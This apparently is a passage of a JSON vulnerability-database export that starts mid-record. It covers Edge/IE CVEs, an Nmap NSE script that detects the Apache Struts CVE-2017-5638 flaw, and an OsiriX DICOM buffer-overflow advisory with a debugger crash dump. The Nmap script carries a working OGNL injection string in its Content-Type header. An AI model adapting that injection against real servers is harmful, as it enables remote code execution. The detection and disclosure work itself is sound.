\n[CVE-2017-11793](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11793>)7.6Critical \n[CVE-2017-11794](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11794>)4.3Critical \n[CVE-2017-11796](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11796>)7.5Critical \n[CVE-2017-11798](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11798>)7.6Critical \n[CVE-2017-11800](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11800>)7.6Critical \n[CVE-2017-11805](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11805>)7.5Critical \n[CVE-2017-11808](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11808>)7.5Critical \n[CVE-2017-11804](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11804>)7.5Critical \n[CVE-2017-11809](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11809>)7.5Critical \n[CVE-2017-11799](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11799>)7.5Critical \n[CVE-2017-11822](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11822>)7.6Critical \n[CVE-2017-11806](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11806>)7.5Critical \n[CVE-2017-11802](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11802>)7.5Critical \n[CVE-2017-11807](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11807>)7.5Critical \n[CVE-2017-8726](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8726>)4.3Critical \n[CVE-2017-11821](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11821>)7.5Critical\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[4041689](<http://support.microsoft.com/kb/4041689>) \n[4041693](<http://support.microsoft.com/kb/4041693>) \n[4041676](<http://support.microsoft.com/kb/4041676>) \n[4041690](<http://support.microsoft.com/kb/4041690>) \n[4041681](<http://support.microsoft.com/kb/4041681>) \n[4041691](<http://support.microsoft.com/kb/4041691>) \n[4042895](<http://support.microsoft.com/kb/4042895>) \n[4040685](<http://support.microsoft.com/kb/4040685>)", "modified": "2019-03-07T00:00:00", "published": "2017-10-10T00:00:00", "id": "KLA11112", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11112", "title": "\r KLA11112Multiple vulnerabilities in Microsoft Edge and Microsoft Internet Explorer ", "type": "kaspersky", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nmap": [{"lastseen": "2019-01-30T16:44:44", "bulletinFamily": "scanner", "description": "Detects whether the specified URL is vulnerable to the Apache Struts Remote Code Execution Vulnerability (CVE-2017-5638).\n\n## Script Arguments \n\n#### http-vuln-cve2017-5638.path \n\nThe URL path to request. The default path is \"/\".\n\n#### http-vuln-cve2017-5638.method \n\nThe HTTP method for the request. The default method is \"GET\".\n\n#### slaxml.debug \n\nSee the documentation for the slaxml library. \n\n#### http.host, http.max-cache-size, http.max-pipeline, http.pipeline, http.useragent \n\nSee the documentation for the http library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the smbauth library. \n\n#### vulns.short, vulns.showall \n\nSee the documentation for the vulns library. \n\n## Example Usage \n \n \n nmap -p <port> --script http-vuln-cve2017-5638 <target>\n \n\n## Script Output \n \n \n PORT STATE SERVICE\n 80/tcp open http\n | http-vuln-cve2017-5638:\n | VULNERABLE\n | Apache Struts Remote Code Execution Vulnerability\n | State: VULNERABLE\n | IDs: CVE:CVE-2017-5638\n |\n | Disclosure date: 2017-03-07\n | References:\n | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638\n | https://cwiki.apache.org/confluence/display/WW/S2-045\n |_ http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html\n \n\n## Requires \n\n * http\n * shortport\n * vulns\n * stdnse\n * string\n * rand\n\n* * *\n", "modified": "2019-01-30T03:00:17", "published": "2017-03-10T17:53:45", "id": "NMAP:HTTP-VULN-CVE2017-5638.NSE", "href": "https://nmap.org/nsedoc/scripts/http-vuln-cve2017-5638.html", "title": "http-vuln-cve2017-5638 NSE Script", "type": "nmap", "sourceData": "description = [[\nDetects whether the specified URL is vulnerable to the Apache Struts\nRemote Code Execution Vulnerability (CVE-2017-5638).\n]]\n\nlocal http = require \"http\"\nlocal shortport = require \"shortport\"\nlocal vulns = require \"vulns\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal rand = require \"rand\"\n\n---\n-- @usage\n-- nmap -p <port> --script http-vuln-cve2017-5638 <target>\n--\n-- @output\n-- PORT STATE SERVICE\n-- 80/tcp open http\n-- | http-vuln-cve2017-5638:\n-- | VULNERABLE\n-- | Apache Struts Remote Code Execution Vulnerability\n-- | State: VULNERABLE\n-- | IDs: CVE:CVE-2017-5638\n-- |\n-- | Disclosure date: 2017-03-07\n-- | References:\n-- | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638\n-- | https://cwiki.apache.org/confluence/display/WW/S2-045\n-- |_ http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html\n--\n-- @args http-vuln-cve2017-5638.method The HTTP method for the request. The default method is \"GET\".\n-- @args http-vuln-cve2017-5638.path The URL path to request. The default path is \"/\".\n\nauthor = \"Seth Jackson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = { \"vuln\" }\n\nportrule = shortport.http\n\naction = function(host, port)\n local vuln = {\n title = \"Apache Struts Remote Code Execution Vulnerability\",\n state = vulns.STATE.NOT_VULN,\n description = [[\nApache Struts 2.3.5 - Struts 2.3.31 and Apache Struts 2.5 - Struts 2.5.10 are vulnerable to a Remote Code Execution\nvulnerability via the Content-Type header.\n ]],\n IDS = {\n CVE = \"CVE-2017-5638\"\n },\n references = {\n 'https://cwiki.apache.org/confluence/display/WW/S2-045',\n 'http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html'\n },\n dates = {\n disclosure = { year = '2017', month = '03', day = '07' }\n }\n }\n\n local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)\n\n local method = stdnse.get_script_args(SCRIPT_NAME..\".method\") or \"GET\"\n local path = stdnse.get_script_args(SCRIPT_NAME..\".path\") or \"/\"\n local value = rand.random_alpha(8)\n\n local header = {\n [\"Content-Type\"] = string.format(\"%%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Check-Struts', '%s')}.multipart/form-data\", value)\n }\n\n local response = http.generic_request(host, port, method, path, { header = header })\n\n if response and response.status == 200 and response.header[\"x-check-struts\"] == value then\n vuln.state = vulns.STATE.VULN\n end\n\n return vuln_report:make_output(vuln)\nend\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zeroscience": [{"lastseen": "2019-03-20T18:10:05", "bulletinFamily": "exploit", "description": "Title: OsiriX DICOM Viewer 8.0.1 (dulparse.cc) Remote Memory Corruption Vulnerability \nAdvisory ID: [ZSL-2016-5382](<ZSL-2016-5382.php>) \nType: Local/Remote \nImpact: System Access, DoS \nRisk: (4/5) \nRelease Date: 16.12.2016 \n\n\n##### Summary\n\nWith high performance and an intuitive interactive user interface, OsiriX MD is the most widely used DICOM viewer in the world. It is the result of more than 10 years of research and development in digital imaging. It fully supports the DICOM standard for an easy integration in your workflow environment and an open platform for development of processing tools. It offers advanced post-processing techniques in 2D and 3D, exclusive innovative technique for 3D and 4D navigation and a complete integration with any PACS. OsiriX MD supports 64-bit computing and multithreading for the best performances on the most modern processors. OsiriX MD is certified for medical use, FDA cleared and CE II labeled. \n \nOsiriX is an image processing application for Mac dedicated to DICOM images (\".dcm\" / \".DCM\" extension) produced by equipment (MRI, CT, PET, PET-CT, ...). Osirix is complementary to existing viewers, in particular to nuclear medicine viewers. \n\n##### Description\n\nThe vulnerability is caused due to the usage of vulnerable collection of libraries that are part of DCMTK Toolkit, specifically the parser for the DICOM Upper Layer Protocol or DUL. Stack/Heap Buffer overflow/underflow can be triggered when sending and processing wrong length of ACSE data structure received over the network by the DICOM Store-SCP service. An attacker can overflow the stack and the heap of the process when sending large array of bytes to the presentation context item length segment of the DICOM standard, potentially resulting in remote code execution and/or denial of service scenario. \n \n\\-------------------------------------------------------------------------------- \n \n` (lldb) \nProcess 65202 stopped \n* thread #20: tid = 0x2c5fcc, 0x0000000108978441 OsiriX Lite`parseAssociate(unsigned char*, unsigned int, dul_associatepdu*) + 833, name = 'DICOM Store-SCP', stop reason = EXC_BAD_ACCESS (code=1, address=0x7fb5af00fda1) \nframe #0: 0x0000000108978441 OsiriX Lite`parseAssociate(unsigned char*, unsigned int, dul_associatepdu*) + 833 \nOsiriX Lite`parseAssociate: \n-> 0x108978441 : movzbl (%r10), %eax \n0x108978445 : cmpl $0x40, %eax \n0x108978448 : movq -0x200(%rbp), %rcx \n0x10897844f : je 0x108978513 ; \n(lldb) bt \n* thread #19: tid = 0x2f6189, 0x0000000102fe8441 OsiriX Lite`parseAssociate(unsigned char*, unsigned int, dul_associatepdu*) + 833, name = 'DICOM Store-SCP', stop reason = EXC_BAD_ACCESS (code=1, address=0x7fab8ac000a1) \n* frame #0: 0x0000000102fe8441 OsiriX Lite`parseAssociate(unsigned char*, unsigned int, dul_associatepdu*) + 833 \nframe #1: 0x0000000102fe4363 OsiriX Lite`AE_6_ExamineAssociateRequest(PRIVATE_NETWORKKEY**, PRIVATE_ASSOCIATIONKEY**, int, void*) + 339 \nframe #2: 0x0000000102fe14ca OsiriX Lite`PRV_StateMachine(PRIVATE_NETWORKKEY**, PRIVATE_ASSOCIATIONKEY**, int, int, void*) + 314 \nframe #3: 0x0000000102fdae9c OsiriX Lite`DUL_ReceiveAssociationRQ(void**, DUL_BLOCKOPTIONS, int, DUL_ASSOCIATESERVICEPARAMETERS*, void**, int) + 4348 \nframe #4: 0x0000000102facf1e OsiriX Lite`ASC_receiveAssociation(T_ASC_Network*, T_ASC_Association**, long, void**, unsigned int*, bool, DUL_BLOCKOPTIONS, int) + 462 \nframe #5: 0x0000000102c5f28f OsiriX Lite`DcmQueryRetrieveSCP::waitForAssociation(T_ASC_Network*) + 207 \nframe #6: 0x0000000102c3f9c7 OsiriX Lite`-[DCMTKQueryRetrieveSCP run] + 4999 \nframe #7: 0x0000000102987a37 OsiriX Lite`-[AppController startSTORESCP:] + 519 \nframe #8: 0x00007fff975b030d Foundation`__NSThread__start__ + 1243 \nframe #9: 0x00007fffab021aab libsystem_pthread.dylib`_pthread_body + 180 \nframe #10: 0x00007fffab0219f7 libsystem_pthread.dylib`_pthread_start + 286 \nframe #11: 0x00007fffab021221 libsystem_pthread.dylib`thread_start + 13 \n(lldb) register read \nGeneral Purpose Registers: \nrax = 0x0000000000000103 \nrbx = 0x00000001044c18d8 OsiriX Lite`ECC_Normal \nrcx = 0x00006100002e6200 \nrdx = 0x000000000001ad41 \nrdi = 0x00000001044c18d8 OsiriX Lite`ECC_Normal \nrsi = 0x00006100002e6200 \nrbp = 0x0000700005a4a670 \nrsp = 0x0000700005a4a420 \nr8 = 0x0000000000000103 \nr9 = 0x00000000fb40cfc6 \nr10 = 0x00007fab8ac000a1 \nr11 = 0x0000000000000041 \nr12 = 0x0000700005a4a6b8 \nr13 = 0x00000001044c18f0 OsiriX Lite`EC_Normal \nr14 = 0x00000001044c18d8 OsiriX Lite`ECC_Normal \nr15 = 0x0000000000008014 \nrip = 0x0000000102fe8441 OsiriX Lite`parseAssociate(unsigned char*, unsigned int, dul_associatepdu*) + 833 \nrflags = 0x0000000000010286 \ncs = 0x000000000000002b \nfs = 0x0000000000000000 \ngs = 0x0000000000000000 \n` \n\\-------------------------------------------------------------------------------- \n \n\n\n##### Vendor\n\nPixmeo Sarl - <http://www.osirix-viewer.com>\n\n##### Affected Version\n\nOsiriX 8.0.1 \n\n##### Tested On\n\nOS X 10.12.2 (Sierra) \nOS X 10.12.1 (Sierra) \n\n##### Vendor Status\n\n[29.11.2016] Vulnerability discovered. \n[30.11.2016] Vendor contacted. \n[30.11.2016] Vendor responds asking more details. \n[02.12.2016] Sent details to the vendor. \n[02.12.2016] Vendor states that the issue is in the DCMTK library which they didn\u2019t develop and thus will not try to reproduce or fix this vulnerability. \n[16.12.2016] Public security advisory released. \n\n##### PoC\n\n[osirix_bof.py](<../../codes/osirix_bof.txt>)\n\n##### Credits\n\nVulnerability discovered by Gjoko Krstic - &lt;[gjoko@zeroscience.mk](<mailto:gjoko@zeroscience.mk>)&gt;\n\n##### References\n\n[1] <https://tools.ietf.org/html/rfc3240> \n[2] <https://github.com/commontk/DCMTK/commit/1b6bb76> \n[3] <https://www.exploit-db.com/exploits/40926/> \n[4] <https://cxsecurity.com/issue/WLB-2016120096> \n[5] <https://packetstormsecurity.com/files/140189> \n[6] <http://www.vfocus.net/art/20161219/13212.html>\n\n##### Changelog\n\n[16.12.2016] - Initial release \n[20.12.2016] - Added reference [3], [4], [5] and [6] \n\n##### Contact\n\nZero Science Lab \n \nWeb: <http://www.zeroscience.mk> \ne-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)\n", "modified": "2016-12-16T00:00:00", "published": "2016-12-16T00:00:00", "id": "ZSL-2016-5382", "href": "http://zeroscience.mk/en/vulnerabilities/ZSL-2016-5382.php", "title": "OsiriX DICOM Viewer 8.0.1 (dulparse.cc) Remote Memory Corruption Vulnerability", "type": "zeroscience", "sourceData": "REQUEST LIMIT REACHED", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "http://zeroscience.mk/en/vulnerabilities/../../codes/osirix_bof.txt"}]}